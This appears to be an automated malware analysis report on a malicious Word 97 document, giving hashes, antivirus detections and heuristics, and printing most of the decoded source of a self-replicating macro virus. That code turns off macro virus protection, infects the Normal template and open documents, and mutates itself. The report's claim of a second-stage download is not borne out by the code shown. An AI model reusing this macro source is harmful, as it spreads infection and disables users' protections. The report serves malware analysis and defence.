Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 068706fe1cecc462…

MALICIOUS

Office (OLE)

35.5 KB Created: 1980-01-11 06:24:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1b64f5df94040922f14c957d70bd44e7 SHA-1: 24df0f571630ef638082a2f1ec2f14522ec5c272 SHA-256: 068706fe1cecc462718ac2763fa92a7a0e4830bc74102846a283688653c115a0
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Agnes-5. It contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The macro attempts to disable security features such as macro warnings and virus protection, and its obfuscated nature suggests it is designed to download or execute a second-stage payload.

Heuristics 4

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19056 bytes
SHA-256: b5ccc528004f1e879ce26940d3d1c7785daee6c9f7ba2d4c31ccf635713a8d65
Detection
ClamAV: Doc.Trojan.Agnes-5
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AL"
Sub RuLeQp9075()
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Randomize
ActiveLines = Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule.CountOfLines
If ActiveLines > 300 Then
With Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule
For TheLine = 1 To .CountOfLines
If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
Next TheLine
End With
Else
With Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule
PolySize = Int(Rnd * 10)
For PolyMorphic = 1 To PolySize
PolyString = ""
PolyLines = .CountOfLines
RndLine = Int(Rnd * PolyLines) + 1
StringSize = Int(Rnd * 39) + 1
For SomeString = 1 To StringSize
PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
Next SomeString
.InsertLines RndLine, "Rem " & PolyString
Next PolyMorphic
End With
End If
If Day(Now()) = 10 Then
Application.Caption = "AGNES LEE"
End If
Application.CommandBars("View").Controls(6).Delete
Application.CommandBars("Format").Controls(12).Delete
Application.CommandBars("Tools").Controls(12).Delete
Application.CommandBars("Tools").Controls(13).Delete
End Sub
Sub Tl569()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("AL").Export "C:\AL.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.AL" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 18288-Tl-5699075-Lm.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "AL" Then RfEfVg8187VhPkUu569 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "AL" Then VlCjMk457RuLeQp9075 = True
Next y
If RfEfVg8187VhPkUu569 = True And VlCjMk457RuLeQp9075 = False Then Set TkErNq244PwQuUk36 = ActiveDocument.VBProject
If RfEfVg8187VhPkUu569 = False And VlCjMk457RuLeQp9075 = True Then Set TkErNq244PwQuUk36 = NormalTemplate.VBProject
If RfEfVg8187VhPkUu569 = True And VlCjMk457RuLeQp9075 = True Then GoTo Ende_
TkErNq244PwQuUk36.VBComponents.Import "C:\AL.sys"
If VlCjMk457RuLeQp9075 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If RfEfVg8187VhPkUu569 = False Then NormalTemplate.Save
Ende_:
Call RuLeQp9075
End Sub
Rem ExKfKzQmJwLyTlNwAoKrVgBxNjMjKeNqCoRlMgUkCkKnHjEhItTrJtPpJsJwHrGmAvKsBnTfLvPoNo
Sub AutoOpen()
On Error Resume Next
Call Tl569
Call RuLeQp9075
Rem Gj
End Sub
Sub AutoExit()
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub AutoNew()
Rem JhCeSoNtPfLxPmTpSwUnAvAqFqSwTrNeArUsFfMzUi
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub AutoExec()
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Tl569
Call RuLeQp9075
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Rem IgHmRoExKsFqGgTyAhQnLkEoDmMtFrFpFgJzOlKr
Call Tl569
... (truncated)